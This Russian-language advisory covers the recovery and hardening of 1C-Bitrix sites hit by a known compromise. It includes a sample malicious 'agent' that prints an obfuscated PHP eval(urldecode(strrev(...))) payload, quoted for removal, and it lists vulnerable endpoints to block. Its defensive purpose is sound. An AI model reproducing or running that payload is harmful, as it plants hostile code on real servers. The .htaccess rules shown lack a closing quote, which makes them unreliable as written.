Кто в зоне риска
- Все не обновленные версии Битрикс.
- Обновленные версии Битрикс с незакрытыми уязвимостями
Что делать
Рассмотрим два сценария если уже взломали и заразили и предотвратить заражение
если уже заразили
При заражении сайта наносится ущерб:- заменяют index.php в корне сайта,
- удаляют файл /bitrix/.settings.php,
- создают скрипты Агенты с вредоносным кодом
- создают файл /bitrix/tools/putin_***lo.php с кодом для удаленного доступа
- удаляют данные из таблиц базы данных b_iblock, b_iblock_element, b_iblock_element_property
Восстанавливаем работу сайта
- Восстанавливаем сайт из резервной копии. Как минимум нужно восстановить базу данных
- Меняем административные доступы к сайту, FTP доступ, MySQL доступ
- Проверяем и при наличии удаляем файл /bitrix/tools/putin_***lo.php
- На странице со списком Агентов /bitrix/admin/agent_list.php проверяем вызываемые функции на наличие вредоносного кода.
Пример агентов которые нужно удалить:
$arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4%03%43%65%b4%46%c6%74%a4%26%e4%74%a4%f6%15%d6%36%67%86%96%36%f6%e4%75%05%57%15%74%a4%07%37%97%b4%07%25%97%f4%07%d4%74%a4%f6%43%75%a5%37%a4%84%46%a7%87%45%16%b6%37%44%d4%93%b6%74%a4%f6%94%33%26%d6%47%44%45%d4%65%c6%45%07%36%d6%26%07%a4%84%46%a7%86%35%05%b6%25%97%f4%07%03%c6%94%d6%24%a7%d4%23%95%75%a5%43%d4%d6%d4%d6%65%44%f4%97%55%d6%95%c6%65%74%f4%97%15%75%e4%23%55%d6%d4%53%15%44%a5%43%d4%74%a5%a6%e4%d6%94%26%65%55%35%c4%93%03%45%44%93%64%a4%f6%55%74%a5%67%e4%75%a5%b6%93%64%e4%23%55%23%36%86%a4%75%05%a6%25%97%f4%07%14%44%b4%e6%53%75%16%03%a4%33%26%77%65%d6%36%66%a4%33%26%97%a4%85%a5%76%14%84%16%77%93%44%05%22%82%56%46%f6%36%56%46%f5%43%63%56%37%16%26%02%c2%22%07%86%07%e2%f6%c6%96%57%86%f5%e6%96%47%57%07%f2%37%c6%f6%f6%47%f2%87%96%27%47%96%26%f2%22%e2%d5%22%45%f4%f4%25%f5%45%e4%54%d4%55%34%f4%44%22%b5%25%54%65%25%54%35%f5%42%82%37%47%e6%56%47%e6%f6%36%f5%47%57%07%f5%56%c6%96%66%')));
Если кратко - нужно восстановить сайт в состоянии до заражения, проверить следы заражения и перейти к пункту защиты от заражения.
предотвратить заражение
- Перевести работу сайта на актуальную версию php 7.4 (если это еще не сделано)
- Обновить Битрикс до актуальной версии
- Если на сайте есть модуль "Проактивная защита" /bitrix/admin/security_panel.php - выполнить настройки по рекомендациям модуля
- Проверить сайт инструментом Битрикс "Сканер безопасности" /bitrix/admin/security_scanner.php
- Закрыть доступ к файлам на уровне сервера (например в .htaccess)
-- /bitrix/tools/upload.php
-- /bitrix/tools/mail_entry.php
-- /bitrix/modules/main/include/virtual_file_system.php
-- /bitrix/components/bitrix/sender.mail.editor/ajax.php
-- /bitrix/tools/vote/uf.php
-- /bitrix/tools/html_editor_action.php
-- /bitrix/admin/site_checker.php - Проверить и включить логирование на хостинг площадке (access, error)
Пример ограничения доступа к уязвимым файлам
Помните что это временное решение - часть функционала административной панели сайта будет не доступна.
/home/bitrix/www/bitrix/admin/.htaccess
Добавляем в файле правило. Если файла нет - создаем.
<Files ~ "^(site_checker)\.php$>
deny from all
</Files>
/home/bitrix/www/bitrix/tools/.htaccess
Добавляем в файле правило. Если файла нет - создаем.
<Files ~ "^(html_editor_action|mail_entry|upload)\.php$>
deny from all
</Files>
/home/bitrix/www/bitrix/modules/main/include/.htaccess
Добавляем в файле правило. Если файла нет - создаем.
<Files ~ "^(virtual_file_system)\.php$>
deny from all
</Files>
/home/bitrix/www/bitrix/components/bitrix/sender.mail.editor/.htaccess
Добавляем в файле правило. Если файла нет - создаем.
<Files ~ "^(ajax)\.php$>
deny from all
</Files>
/bitrix/tools/vote/.htaccess
<Files ~ "^(uf)\.php$>
deny from all
</Files>
